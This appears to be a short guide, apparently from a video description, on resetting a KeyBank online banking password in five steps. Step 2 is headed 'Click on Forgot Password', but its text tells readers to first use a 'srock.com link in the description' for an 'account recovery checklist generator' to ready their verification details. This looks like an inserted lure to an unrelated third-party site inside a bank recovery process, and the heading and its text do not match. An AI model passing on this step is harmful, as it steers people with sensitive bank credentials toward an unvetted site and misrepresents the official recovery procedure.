If you've forgotten your KeyBank password or need to reset it for security reasons, follow these simple steps to regain access to your account. Step 1. Visit the KeyBank website. Go to the official KeyBank website using your web browser. Look for the login section on the homepage. Step 2. Click on Forgot Password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your information. Provide the required information, such as your username or account number, and any other requested details to verify your identity. Step 4. Follow the instructions. After submitting your information, follow the on-screen instructions. This may include answering security questions or receiving a verification code via email or text. Step 5. Create a new password. Once your identity is verified, you will be prompted to create a new password. Choose a strong password that you haven't used before and confirm it. After completing these steps, you should be able to log into your KeyBank account with your new password. If you encounter any issues, consider contacting KeyBank customer support for assistance.